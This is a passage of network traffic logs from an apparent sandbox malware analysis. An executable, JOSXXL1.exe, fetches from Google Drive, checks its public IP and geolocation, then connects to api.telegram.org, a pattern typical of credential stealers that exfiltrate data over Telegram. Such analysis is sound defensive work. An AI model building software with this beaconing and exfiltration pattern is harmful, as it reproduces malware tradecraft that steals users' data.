                                                                                                      Oct 26, 2024 23:57:15.841460943 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.841490030 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.841552019 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.841909885 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.841964006 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.842178106 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.842236996 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.882169962 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.882260084 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.882359028 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.882416964 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.954698086 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.954765081 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.954843998 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.954893112 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.955010891 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.955060005 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.955099106 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.955144882 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.958340883 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.958400965 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.958508968 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.958575010 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.958836079 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.958894014 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.958921909 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.958973885 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.959281921 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.959641933 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.959656000 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.959709883 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.999449968 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.999522924 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.999581099 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.999640942 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.999886036 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.999946117 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.999979019 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.000030994 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.072019100 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.072114944 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.072138071 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.072206020 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.072436094 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.072506905 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.072525024 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.072577000 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.075810909 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.075917959 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.076055050 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.076107979 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.076288939 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.076349020 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.076383114 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.076433897 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.077068090 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.077121019 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.077176094 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.077233076 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.128420115 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.128827095 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.128887892 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.129244089 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.160748005 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.160958052 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.161036015 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.161118984 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.189945936 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.190128088 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.190135002 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.190195084 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.190325022 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.190325022 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.190565109 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.190629005 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.193197012 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.193249941 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.193383932 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.193525076 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.193650007 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.193708897 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.193945885 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.194004059 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.194044113 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.194098949 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.194382906 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.194441080 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.194467068 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.194521904 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.194813967 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.194879055 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.245541096 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.245639086 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.245656013 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.245769024 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.278294086 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.278645992 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.278702974 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.279225111 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.307394028 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.307554007 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.307569027 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.307631016 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.309055090 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.309118986 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.309191942 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.309782028 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.310615063 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.310869932 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:16.310883045 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:16.310935020 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:23.313555956 CEST61922443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:23.313817978 CEST61922443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:23.313847065 CEST44361922188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:23.355006933 CEST6191980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:23.975445032 CEST44361922188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:23.977497101 CEST61922443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:23.977574110 CEST44361922188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.129806995 CEST44361922188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.130027056 CEST44361922188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.130105972 CEST61922443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:24.135037899 CEST61922443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:24.141094923 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:24.147233009 CEST8061927193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.147346973 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:24.147428989 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:24.152884007 CEST8061927193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.929389954 CEST8061927193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.940370083 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:24.940392017 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.940506935 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:24.945127964 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:24.945142031 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:24.980027914 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.559602022 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.561312914 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:25.561343908 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.708434105 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.708667040 CEST44361933188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.708726883 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:25.709008932 CEST61933443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:25.712125063 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.713063955 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.718053102 CEST8061927193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.718173027 CEST6192780192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.718482971 CEST8061939193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:25.718569994 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.718627930 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:25.724093914 CEST8061939193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:26.380525112 CEST8061939193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:26.381767035 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:26.381846905 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:26.381922007 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:26.382162094 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:26.382198095 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:26.433161974 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:26.995883942 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:26.997277975 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:26.997353077 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.149044037 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.149271965 CEST44361945188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.149353027 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:27.149859905 CEST61945443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:27.153095007 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:27.153912067 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:27.158881903 CEST8061939193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.158957958 CEST6193980192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:27.159301043 CEST8061950193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.159411907 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:27.159492970 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:27.164799929 CEST8061950193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.838432074 CEST8061950193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.851567030 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:27.851648092 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.851730108 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:27.852133036 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:27.852161884 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:27.886320114 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.477348089 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.479371071 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:28.479454994 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.624186993 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.624273062 CEST44361952188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.624464035 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:28.624829054 CEST61952443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:28.628776073 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.629923105 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.634670973 CEST8061950193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.634757042 CEST6195080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.635410070 CEST8061958193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:28.635520935 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.635612011 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:28.641118050 CEST8061958193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:29.307995081 CEST8061958193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:29.309318066 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:29.309370041 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:29.309451103 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:29.309699059 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:29.309714079 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:29.355020046 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:29.933979034 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:29.935372114 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:29.935409069 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.079467058 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.079713106 CEST44361964188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.080168962 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:30.080490112 CEST61964443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:30.083367109 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:30.089272022 CEST8061958193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.089380026 CEST6195880192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:30.092859030 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:30.098309040 CEST8061970193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.098412037 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:30.098470926 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:30.104150057 CEST8061970193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.792260885 CEST8061970193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.793809891 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:30.793889046 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.793982983 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:30.794181108 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:30.794198990 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:30.839623928 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:31.407813072 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.409615040 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:31.409693003 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.552814007 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.553052902 CEST44361976188.114.96.3192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.553133011 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:31.553481102 CEST61976443192.168.2.4188.114.96.3
                                                                                                      Oct 26, 2024 23:57:31.586294889 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:31.593624115 CEST8061970193.122.130.0192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.593687057 CEST6197080192.168.2.4193.122.130.0
                                                                                                      Oct 26, 2024 23:57:31.598575115 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:31.598613977 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:31.598689079 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:31.598985910 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:31.599014044 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.473891973 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.473979950 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:32.475507021 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:32.475523949 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.475975037 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.477336884 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:32.523328066 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.724792957 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.724879980 CEST44361981149.154.167.220192.168.2.4
                                                                                                      Oct 26, 2024 23:57:32.724968910 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:32.729470968 CEST61981443192.168.2.4149.154.167.220
                                                                                                      Oct 26, 2024 23:57:38.719151020 CEST6191980192.168.2.4193.122.130.0
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 26, 2024 23:57:10.401118040 CEST | 192.168.2.4 | 1.1.1.1 | 0xa8c7 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:11.775019884 CEST | 192.168.2.4 | 1.1.1.1 | 0x8e03 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:17.668143034 CEST | 192.168.2.4 | 1.1.1.1 | 0xcb4d | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:18.856044054 CEST | 192.168.2.4 | 1.1.1.1 | 0xe470 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:30.083777905 CEST | 192.168.2.4 | 1.1.1.1 | 0x8de0 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:31.586850882 CEST | 192.168.2.4 | 1.1.1.1 | 0xf94f | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 26, 2024 23:57:10.408746958 CEST | 1.1.1.1 | 192.168.2.4 | 0xa8c7 | No error (0) | drive.google.com | | 142.250.185.238 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:11.783696890 CEST | 1.1.1.1 | 192.168.2.4 | 0x8e03 | No error (0) | drive.usercontent.google.com | | 142.250.181.225 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:17.675543070 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb4d | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 26, 2024 23:57:17.675543070 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb4d | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:17.675543070 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb4d | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:17.675543070 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb4d | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:17.675543070 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb4d | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:17.675543070 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb4d | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:18.863738060 CEST | 1.1.1.1 | 192.168.2.4 | 0xe470 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:18.863738060 CEST | 1.1.1.1 | 192.168.2.4 | 0xe470 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:30.091801882 CEST | 1.1.1.1 | 192.168.2.4 | 0x8de0 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 26, 2024 23:57:30.091801882 CEST | 1.1.1.1 | 192.168.2.4 | 0x8de0 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:30.091801882 CEST | 1.1.1.1 | 192.168.2.4 | 0x8de0 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:30.091801882 CEST | 1.1.1.1 | 192.168.2.4 | 0x8de0 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:30.091801882 CEST | 1.1.1.1 | 192.168.2.4 | 0x8de0 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:30.091801882 CEST | 1.1.1.1 | 192.168.2.4 | 0x8de0 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 26, 2024 23:57:31.597981930 CEST | 1.1.1.1 | 192.168.2.4 | 0xf94f | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                      • drive.google.com
                                                                                                      • drive.usercontent.google.com
                                                                                                      • reallyfreegeoip.org
                                                                                                      • api.telegram.org
                                                                                                      • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 61886 | 193.122.130.0 | 80 | 3492 | C:\Users\user\Desktop\JOSXXL1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 23:57:17.687619925 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 26, 2024 23:57:18.357789993 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:18 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 8f37fa3a8999698704edd3c5376de767
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>
Oct 26, 2024 23:57:18.363281012 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
